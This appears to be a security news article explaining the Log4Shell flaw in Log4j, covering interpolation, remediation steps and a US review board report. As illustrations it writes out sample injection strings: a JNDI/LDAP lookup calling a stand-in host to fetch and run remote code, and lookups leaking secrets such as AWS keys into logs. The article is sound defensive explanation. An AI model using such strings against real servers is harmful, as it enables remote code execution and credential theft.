It was a dangerous bug in a popular open-source Java programming toolkit called Log4jshort for “Logging for Java”, published by the Apache Software Foundation under a liberal, free source code license.
If you’ve ever written software of any sort, from the simplest BAT file on a Windows laptop to the gnarliest mega-application running on a whole rack of servers, you’ll have used logging commands.
From basic output such as
echo "Starting calculations (this may take a while)" printed to the screen, all the way to formal messages saved in a write-once database for auditing or compliance reasons, logging is a vital part of most programs, especially when something breaks and you need a clear record of exactly how far you got before the problem hit.
The Log4Shell vulnerability (actually, it turned out there were several related problems, but we’ll treat them all as if they were one big issue here, for simplicity) turned out to be half-bug, half-feature.
In other words, Log4j did what it said in the manual, unlike in a bug such aa buffer overflow, where the offending program incorrectly tries to mess around with data it promised it would leave alone…
… But unless you had read the manual really carefully, and taken additional precautions yourself by adding a layer of careful input verification on top of Log4j, your software could come unstuck.
Really, badly, totally unstuck.
Interpolation considered harmful
Simply put, Log4j did not always record log messages exactly as you supplied them.
Instead, it had a “feature” known variously and confusingly in the jargon as interpolation, command substitution or auto-rewritingso that you could trigger text manipulation features inside the logging utility itself, without having to write special code of your own to do it.
For example, the text in the INPUT column below would get logged literally, exactly as you see it, which is probably what you’d expect from a logging toolkit, especially if you wanted to keep a precise record of the input data your users presented for regulatory reasons:
INPUT OUTCOME ----------------------- ------------------------ USERNAME=duck -> USERNAME=duck Caller-ID:555-555-5555 -> Caller-ID:555-555-5555 Current version = 17.0.1 -> Current version = 17.0.1
But if you submitted text wrapped in the magic character sequence
$...the logger would sometimes do smart things with it, after receiving the text but before actually writing in into the logfile, like this:
INPUT OUTCOME ---------------------------------- ------------------------------------------- CURRENT=$java:version/$java:os -> CURRENT=Java version 17.0.1/Windows 10 10.0 Server account is: $env:USER -> Server account is: root $env:AWS_ACCESS_KEY_ID -> SECRETDATAINTENDEDTOBEINMEMORYONLY
Clearly, if you’re accepting logging text from a trusted source, where it’s reasonable to allow the loggee to control the logger by telling it to replace plain text with internal data, this sort of text rewriting is useful.
But if your goal is to keep track of data submitted by a remote user, perhaps for regulatory record-keeping purposes, this sort of auto-rewriting is doubly dangerous:
- In the event of a dispute, you do not have a reliable record of what the user actually did submit, given that it might have been modified between input and output.
- A malicious user could send sneakily-constructed inputs in order to provoke your server into doing something it was not supposed to.
If you’re logging user inputs such as their browser identification string, say (known in the jargon as the
User-Agent), or their username or phone number, you do not want to give the user a chance to trick you into writing private data (such as a memory-only password string like the AWS_ACCESS_KEY_ID in the example above) into a permanent logfile.
Especially if you’ve confidently told your auditors or the regulator that you never write plaintext passwords into permanent storage. (You should not do this, even if you have not officially told the regulator you do not!)
Worse to come
In the Log4Shell is-it-a-bug-or-is-it-a-feature case, however, things were much worse than the already-risky examples we’ve shown above.
For example, a user who deliberately submitted data like the input shown below could trigger a truly dangerous sequence of events:
INPUT OUTCOME ------------------------------------------------ ---------------------------------------- $jndi:ldap://dodgy.server.example:8888/BadThing -> Download and run a remote Java program!?
In the “interpolation” string above, the
$... character sequence that includes the abbreviations
ldap told Log4j to do this:
- Use the Java Naming and Directory Interface (JNDI) to locate
- Connect to that server via LDAP, using TCP port 8888.
- Request the data stored in the LDAP object
In other words, attackers could submit specially-crafted input that would instruct your server to “call home” to a server under their controlwithout so much as a by-your-leave.
How could this be a “feature”?
You might be wondering how a “feature” like this ever made it into the Log4j code.
But this sort of text rewriting can be useful, as long as you’re logging data from a trusted source.
For example, you could log a numerical user ID, but also ask the logger to use LDAP (the lightweight directory access protocolwidely used in the industry, including by Microsoft’s Active Directory system) to retrieve and save the username associated with that account number at that time.
This would improve both the readability and the historical value of the entry in the logfile.
But the LDAP server that Log4j called out in the example above (which was chosen by the remote user, do not forget) is unlikely to know the truth, let alone to tell it, and a malicious user could therefore use this trick fill up your logs with bogus and even legally dubious data.
Even worse, the LDAP server could return precompiled Java code for generating the data to be loggedand your server would dutifully run that program –- an unknown program, supplied by an untrusted server, chosen by an untrusted user.
Loosely speaking, if any server, anywhere in your network, logged untrusted input that had come in from outside, and used Log4j to do so…
… Then that input could be used as a direct and immediate way to trick your server into run someone else’s code, just like that.
That’s called RCE in the jargon, short for remote code executionand RCE bugs are generally the most keenly sought by cybercriminals because thay can typically be exploited to implant malware automatically.
Unfortunately, the nature of this bug meant that the danger was not limited to internet-facing servers, so using web servers written in C, not Java (eg IIS, Apache https, nginx), and therefore did not themselves use the buggy Log4j code, did not free you from risk.
In theory, any back-end Java app that received and logged data from elsewhere on your network, and that used the Log4j library…
… Could potentially be reached and exploited by outside attackers.
The fix was pretty straightforward:
- Find old versions of
Log4janywhere and everywhere in your network. Java modules typically have names like
jaris short for Java archive, a specially-structured sort of ZIP file. With a searchable prefix, a definitive extension, and the version number embedded in the filename, quickly finding offending files with “the wrong” versions of Java library code is actually fairly easy.
- Replace the buggy versions with newer, patched ones.
- If you were not in a position to change Log4J version, you could reduce or remove the risk by removing a single code module from the from the buggy Log4j package (the Java code that handled JNDI lookups, as described above), and repackaging your own slimmed-down JAR file with the bug suppressed.
The saga continues
Unfortunately, a recent, detailed report on the Log4Shell saga, published last week by the US Cybersecurity Review Board (CSRB), part of the Department of Homeland Security, contains the worrying suggestion (our emphasis below) that:
[T]he Log4j event is not over. The [CSRB] assesses that Log4j is an “endemic vulnerability” and that vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer. Significant risk remains.
What to do?
At 42 pages (the executive summary alone runs to nearly three pages), the Board’s report is a long document, and parts of it are heavy going.
But we recommend that you read it through, because it’s a fascinating tale of how even cybersecurity problems that ought to be quick and easy to fix can get ignored, or put off until later, or as-good-as denied altogther as “someone else’s problem ”to fix.
Notable suggestions from the US public service, which we wholeheartedly endorse, include:
- Develop the capacity to maintain an accurate information technology (IT) asset and application inventory.
- [Set up a] documented vulnerability response program.
- [Set up a] documented vulnerability disclosure and handling process.
When it comes to cybersecurity, ask not what everyone else can do for you…
… But think about what you can do for yourself, because any improvements you make will almost certainly benefit everyone else as well.